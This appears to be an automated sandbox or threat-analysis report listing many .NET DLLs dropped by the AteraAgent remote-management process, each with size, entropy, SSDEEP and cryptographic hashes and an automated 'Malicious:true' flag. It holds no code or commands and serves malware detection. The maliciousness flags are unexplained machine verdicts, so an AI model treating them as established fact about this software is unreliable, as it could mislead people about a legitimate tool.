                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.851823443966221
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:nNoqWD7WJlNyb8E9VF6IYijSJIVxejP0IRV:nNofwhEpYi60w/v
                                                                                                                                                                                                                                                                                                                                  MD5:B7707677F95DC6B65F60C83030EE109E
                                                                                                                                                                                                                                                                                                                                  SHA1:29956B237B59E670BF64ECDF35D8C114504B9024
                                                                                                                                                                                                                                                                                                                                  SHA-256:199036C43CE49DA87DFEE274CE22EDCD542A67E293ECC85FA821FD5CCBE5B300
                                                                                                                                                                                                                                                                                                                                  SHA-512:9A41B0A63EEDE79B047F67B49D6FF4D9B89E69D30B93333FAC1512C686FDCF3E06BA1A4D901F00AE070063B9F030BA58CB785285B1385B5268605FFC74CE580A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.864186494702641
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:7GETSAWUEWSWNyb8E9VF6IYijSJIVx6tjvJ/:/T18+EpYi60sV
                                                                                                                                                                                                                                                                                                                                  MD5:97639DFEDEA8F0AF1D2E56FAD1704859
                                                                                                                                                                                                                                                                                                                                  SHA1:01DE4054E592C84A08E910E3651566AC38B8AD9E
                                                                                                                                                                                                                                                                                                                                  SHA-256:9EBCAE092ECC2922CDC5FDA70B3E2A7D8F80D44C2B8B7B05A7E685B4304C722E
                                                                                                                                                                                                                                                                                                                                  SHA-512:0A69B160C8A669B85E45EB743C05280A16F461C9066E8B6D57A16AA328550B20C2B43226348AB1845E887CF4A899B48BF48F79706AE563EBC23DF6D3D0F68AF0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):110120
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.511217591949193
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:2POw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/Yb76Y:2Ww0SUUKBM8aOUiiGw7qa9tK/Ybf
                                                                                                                                                                                                                                                                                                                                  MD5:6DBDC27D0AB23FC16FA9D6C224972BA4
                                                                                                                                                                                                                                                                                                                                  SHA1:ECECDE85EDD6683E869D0DCA87FA14A45088280F
                                                                                                                                                                                                                                                                                                                                  SHA-256:A8EC7F0B3AE01162D864EBFB6F025D00D2122606713A00B01CFAE359AC3B9965
                                                                                                                                                                                                                                                                                                                                  SHA-512:E53BEE2E201F227D0A4C7B3FEAE0A3E55F37A4A6AC51EE159AA70AADBCDA80740A01A92862F47FD81D82AB9F1349C6E6B7B2CEAB6BCCDAA2532402A1B587051A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.847004569821564
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ncDagtDApWSKJWFrNyb8E9VF6IYijSJIVx4Ls+23:nPKBKnEpYi60NL
                                                                                                                                                                                                                                                                                                                                  MD5:6A285FBCB275B776188A0700D17A5C87
                                                                                                                                                                                                                                                                                                                                  SHA1:121264030BF0F63F1B979C5CB5AE950055C15974
                                                                                                                                                                                                                                                                                                                                  SHA-256:2B679390ABE5842EAD1C9B714CD09F4E9B6F76DBCDFE00B8ABE80681C4173DD5
                                                                                                                                                                                                                                                                                                                                  SHA-512:CCFB93573F10AE73C3498892CF5E952542DB00DE49602C241A95E588309537598121754DB097CAE84F532BE162D6113C696C8FB6441B7B21A25AF53C8B70EB98
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.859026958887054
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:o6NxhqWD4W5wP6Nyby2sE9jBF6IYiYF85S35IVnxGUHFAyboMyN2Lj:FIWD4WmiNyb8E9VF6IYijSJIVxM0wMX
                                                                                                                                                                                                                                                                                                                                  MD5:0F97E6F5A0860FBB4DEC57E79AF9C3F2
                                                                                                                                                                                                                                                                                                                                  SHA1:E98ABB769A4498B5E4781EE19361C074CD5B335F
                                                                                                                                                                                                                                                                                                                                  SHA-256:88DFE7855EA29F7E964063FB090F5FCC77145ABDAE603230C6E9BD18FC3DB0DC
                                                                                                                                                                                                                                                                                                                                  SHA-512:C5B447C0782D6380833251D790AEA3781D7164FCA1D1B73CF7A879F04E2C8A6EF2AF8B0184A82E0D96D6C0C2651C3862F3BFAA6622CB35B0E55F953B8A370B3D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.785865559792791
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:JW2KxVSWzQW5qPFNyby2sE9jBF6IYiYF85S35IVnxGUHFh/JZlG6M0+3:2MWzQWc9Nyb8E9VF6IYijSJIVxN/Jjs3
                                                                                                                                                                                                                                                                                                                                  MD5:01AAA89F873C7F2CA6549DA1F7D7DB38
                                                                                                                                                                                                                                                                                                                                  SHA1:4AFDD877A0CF62C9EEAF2F68D1B3E040030D2E7E
                                                                                                                                                                                                                                                                                                                                  SHA-256:515DCBAF86DE4ABD13E0DBE6D5021A87CF75DBB325E4904EA99D32A67DD125F2
                                                                                                                                                                                                                                                                                                                                  SHA-512:3B48FCF1F18A8C41758F1F4FC036EE6B5A958D081D5B35F189D150DCAB2E99CDE204C790B0078B31F12987ACDBA192C2BF1A671CF198D00FB8C6F6033805D50F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.721584397937309
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:kxDHKWAMWcpNyb8E9VF6IYijSJIVxlPKoK:8D8GtEpYi60VK
                                                                                                                                                                                                                                                                                                                                  MD5:190FE5FA1DC3BB8624D1610B7012459E
                                                                                                                                                                                                                                                                                                                                  SHA1:C88562B10BDF5A2CBFBAC5C5A351761914488C0A
                                                                                                                                                                                                                                                                                                                                  SHA-256:7D903F96A7BD46D0424E066B3D8680ADD4698C2C16570542F69D61B004916EAD
                                                                                                                                                                                                                                                                                                                                  SHA-512:A5021A9DE77449E035BE890221F001373FB66BD5905F6305D3CBFDFCB30C52C16BDA50883B9009704909B241C861FDD3CA4E925E7ED6CFF156FBAEF6E7F1C2A5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8310985278723235
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ULNBEW6pWx7Nyb8E9VF6IYijSJIVxdT1qeAos:UbMSXEpYi60pA1
                                                                                                                                                                                                                                                                                                                                  MD5:BD051C2B9C53F401F9443D1DD5F462AA
                                                                                                                                                                                                                                                                                                                                  SHA1:80E85C5DD21A1AB7CB34CE947D2CFA02C59182EC
                                                                                                                                                                                                                                                                                                                                  SHA-256:DCF472121B40BB573CFDB0B9921E53A3CE6E0B25090FD3410DDACE5864E92A45
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F75DA41D62292818AC0165DB158637FEB65413C5686C4AC53BC53984D48EEA89435FE12F343195516EFC4F7BAD2ECABF00E5AD5A421A861C617720DF1442E7C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.884235708560077
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:dKkHKW/tWBpNyb8E9VF6IYijSJIVxkNKuTwYOVtf:AumtEpYi60WlwXf
                                                                                                                                                                                                                                                                                                                                  MD5:D88D206941D1C611A448186479F9828E
                                                                                                                                                                                                                                                                                                                                  SHA1:C6559E6ED0DF998A102434F49AF16977DCD965AA
                                                                                                                                                                                                                                                                                                                                  SHA-256:26FA370494B85F58E1E0DCF850D2F2D526FEC0DA32775A4D98F62324E09A70C2
                                                                                                                                                                                                                                                                                                                                  SHA-512:7BA78BF4A08FF2C87FC3F245D6A014349280E7EE0D9A02383917074E261429D2AFE766C3258B932280DBBB3DEE4D3D5A7882D63910550FBF8D39F09B2583DE35
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8301187506984045
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:5LnfIWqrWx8Nyb8E9VF6IYijSJIVx7Dq1b5k/:5Df4ocEpYi60gbG/
                                                                                                                                                                                                                                                                                                                                  MD5:FD088C08A01CFB32A4AD43F0696C8E3E
                                                                                                                                                                                                                                                                                                                                  SHA1:8AE6A8D448AE665183F619A2E56B3FB9677EB6A4
                                                                                                                                                                                                                                                                                                                                  SHA-256:261B29C7DC64E4DAE81EEB5E05400B4A8651E98FA4CA22AE849A37B5E96CB7D6
                                                                                                                                                                                                                                                                                                                                  SHA-512:BB793F5B2597434DB2BD5CB610313418964F49A8A599531EC8DB5310C6BBA69D3A3ABA97A04011FB8B874248EFD0E6A4CB98CB5FCCABDB7AE53EC765B08A469C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.671080695362279
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:2h06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeB287p:2y9gpEpYi60App
                                                                                                                                                                                                                                                                                                                                  MD5:F325B5108A0892671C3DA2378EDDA1D4
                                                                                                                                                                                                                                                                                                                                  SHA1:843CBD90B42A7E0C97CB48E5132F11E4AE024114
                                                                                                                                                                                                                                                                                                                                  SHA-256:58810B1E800572C89AC0F2B261D2E4CF50D973671782C89EDC2B73B6E56BC40D
                                                                                                                                                                                                                                                                                                                                  SHA-512:C8C6206ABC3690CDCD615758B18C3E8ACCE97612B1938D381B02FB59E8BB587DBFA55296A6C348F8F29080F99053B27D3E037207B78950E20807A96A037F68B7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.810087017924605
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:TZhbRtxWl8WK1W5dPnNyby2sE9jBF6IYiYF85S35IVnxGUHF8x/6Dpu+K05:1na8WK1WLfNyb8E9VF6IYijSJIVxY4fn
                                                                                                                                                                                                                                                                                                                                  MD5:25B3B9A59A9C4868EE37EEB6CB37751F
                                                                                                                                                                                                                                                                                                                                  SHA1:D0CCCF51877FE99B816AE3BE30D4DDFAA171F492
                                                                                                                                                                                                                                                                                                                                  SHA-256:654188F8671BC2725DC479CB0AA2E78D653C935D13176E98CFE2395FADB50268
                                                                                                                                                                                                                                                                                                                                  SHA-512:7B0DE8F004A908251B471877D9CBB8DDD166EC65AD4DF6FA69C2DA346AB25FC37F51B5B3C4098943E40B4329BC00022654B1281753B413E077D337299CFF5663
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.764681425802429
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:LBSWITWWSNyb8E9VF6IYijSJIVx3mR6gtkVv:L6LyEpYi60WRsv
                                                                                                                                                                                                                                                                                                                                  MD5:0821EA93570C51ED770730AFA432E228
                                                                                                                                                                                                                                                                                                                                  SHA1:26F2FAFB7712C5DFE931EA5658353794E06C94BF
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8783AAC385B675331EA76146DBE7590B476B435742307E58561D6A6A0E75757
                                                                                                                                                                                                                                                                                                                                  SHA-512:09F95B7E529A8017B53A875F398F73CAB267128A73C2E211DAEDC464F67AAC33596FE39B7B0E60D246421E31ECFA8A34CC2900A07474044A2E3FEC31A3E957D8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.873604958411169
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:688cIIWNoWJiNyb8E9VF6IYijSJIVxJtxKOH:69cU7iEpYi605vH
                                                                                                                                                                                                                                                                                                                                  MD5:92C4D6208EEC6CABC33CC56784909697
                                                                                                                                                                                                                                                                                                                                  SHA1:6DBBB3A648EB5982266508FA2E71F423CAC2A249
                                                                                                                                                                                                                                                                                                                                  SHA-256:103106DB7BED940F07BDCD89418DE4E4665B63088970E1B4A522A95A90175A63
                                                                                                                                                                                                                                                                                                                                  SHA-512:7D59C7D0F9F5DE09714942A4C07EB79A4103F4D3AFF7DFF4A4FBF57BBDD14326FF4ED121ED0D2FCE0EF42F29FD51ED63394D1DC21528BDF587401EA78DBBE813
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22568
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.618472083456871
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:okUwx9rm5go1fWKmmW4oqN5dWjaWbJNyb8E9VF6IYijSJIVxowXgjv:3rmoFmWXX/NEpYi60b+v
                                                                                                                                                                                                                                                                                                                                  MD5:634BE9D1097EF4CA02DA4A494C739543
                                                                                                                                                                                                                                                                                                                                  SHA1:A1838872C292FE37997E73236D66DBAB62608C8D
                                                                                                                                                                                                                                                                                                                                  SHA-256:584C915710C8BCF9AD1DBB0452A33584C6F30D63A7EEA45E4448CF020BD3D91D
                                                                                                                                                                                                                                                                                                                                  SHA-512:90335988DD4E083CDAAD5E1E99BB7C1F8D139E080D056DF25C36CE4B02380A328293C976D86FD41108871E69A42805D331BA5715C1B8542DB5F7B9B585FC7DBB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18472
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6714552970476415
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:g09bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVsN:5OAghbsDCyVnVc3p/i2fBVlAO/BRU+pn
                                                                                                                                                                                                                                                                                                                                  MD5:7FCF27F025DAB00D87C51B76637C5279
                                                                                                                                                                                                                                                                                                                                  SHA1:951D205AFF43E57F62BF645670F20F5F82C5353B
                                                                                                                                                                                                                                                                                                                                  SHA-256:EA4CF899D1CDFB05792DE2165DD5EACC811782620FA580FF17100199A45D67B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:7E4A6A8460885C3A35407C2317E3318BF55956524641E7C8A43C4E3DF4D79EF50CACFE485F067FE2F53A6E3F66CFCEE46F9094E55FC1DE0B634BBB8B2A001027
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.826724974873829
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:cNYx4AW6RW5wPSNyby2sE9jBF6IYiYF85S35IVnxGUHFt7kRF885W:r7W6RWmaNyb8E9VF6IYijSJIVxZ758w
                                                                                                                                                                                                                                                                                                                                  MD5:B1C25A0FEB993D093CBA04D095087ED4
                                                                                                                                                                                                                                                                                                                                  SHA1:7DDEF47BD1B90CE1881CF22C143697B1D8843FDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:E6FDB2BBBE0B7D4740B204708B95084AF8421A49E1736F1A7011C3A2E7656FBD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B510D1F32BF419B19473FB3FC6D244727D47458DF42A427F0FB97EAF167A3D2B04B74DC42FE6FC0DA6866BEF9D91FA285D6D30E1BF6838545D3E5D26320AF098
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.92167020492551
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:1I5HeWFwTBsWWcNyb8E9VF6IYijSJIVxuKAjbz:1I5HFwTBI8EpYi60luz
                                                                                                                                                                                                                                                                                                                                  MD5:BB8FAAA42681D198714A146CD9D76964
                                                                                                                                                                                                                                                                                                                                  SHA1:598BFF20869B63315406758DBDD469E61BC3E2DF
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC1C3F597F3DE8B16F50DBCB199D7A4FE03480BC2FCC6A5DFB926DBA1E6D8312
                                                                                                                                                                                                                                                                                                                                  SHA-512:6A969EDFFA18F892ECDAD676C5447970260FE38AF4A1FA249B65889C628C806ECE5D4A73EE861D14594E6EEE4B22D416443008C091B3B13F2496A2E2E6BD0C6C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.890945015945684
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:EAJpVWbfkBnWRXNyb8E9VF6IYijSJIVxngx7:EAJpWfkBAbEpYi60i7
                                                                                                                                                                                                                                                                                                                                  MD5:ED75A2535E51C83194EB1970B9590BA7
                                                                                                                                                                                                                                                                                                                                  SHA1:C061F123CBB2543A0539662D5515B26484C93CF9
                                                                                                                                                                                                                                                                                                                                  SHA-256:0908E236E5F1DBDBB14EEC9CEB173D3B3359AA7D2972CB8E0ACA54A5BACDC1BA
                                                                                                                                                                                                                                                                                                                                  SHA-512:25763A8398677EE6CFE06F757C902F617CED04F98CABF942491DCFFE7CE32DEBBA30A4D0C64517FF5265FAA7B86E568B84147CCF045D459ED027F1A7B84E11B5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):21032
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.539966661191908
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:+8R71h7yzt94dHWFgQBVWeHWFyTBVW2dNyb8E9VF6IYijSJIVxRNOKL:r1dyAqgQBfqyTBZZEpYi607L
                                                                                                                                                                                                                                                                                                                                  MD5:B5EA34DA9CF35DE0D95BA9DA17B01701
                                                                                                                                                                                                                                                                                                                                  SHA1:C22637BD8E9DFE75E040F6E8D26324AE53F35614
                                                                                                                                                                                                                                                                                                                                  SHA-256:A8B3EB5CAB67FF34B4613CEA5A1953DB244F97F7A58FDD7419AE8E78C2B31F89
                                                                                                                                                                                                                                                                                                                                  SHA-512:46851C8D0A38AA09277DF85F2A44ACADA4803217B6BA98C4D5D35CE97C7297334EA3198525489D002F1731CD0B50B9574F3E6F6C10DF4C3553476261E84B7DD5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18984
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.683190581384528
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:wpsBljcZQIVI8CNwbcyMWs4oBOW9MWG4tBOWb8Nyb8E9VF6IYijSJIVxZ8oC83/:ysPMQMI8COYyi4oBNw4tBrcEpYi605/
                                                                                                                                                                                                                                                                                                                                  MD5:9241525E779DDD7D0AA0D804A9B45671
                                                                                                                                                                                                                                                                                                                                  SHA1:21711DB0394F1260C59EC46836CD65B2B1790281
                                                                                                                                                                                                                                                                                                                                  SHA-256:F2FFBA2BB2E684236F6ACDD8EDBD8D7A177CD9985F2C69D8410894D99E1C0E91
                                                                                                                                                                                                                                                                                                                                  SHA-512:D08595BC14CA37BDC9CFB137016FA19A243116CC9BF11BF522D62A5D443E6F8D4DF1D1A1557C5C3784508AE714CD79F7F09BAE2E1ADCF3EF5126A73FB181F1FB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23592
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.319004907808474
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:zbhigwLAuZtM66g/Id7WVXWgvNyb8E9VF6IYijSJIVxdTUFbHI:zbhzkKs9TEpYi60iI
                                                                                                                                                                                                                                                                                                                                  MD5:B1FCFD095D5796C0A87F64DA7DDDE3BE
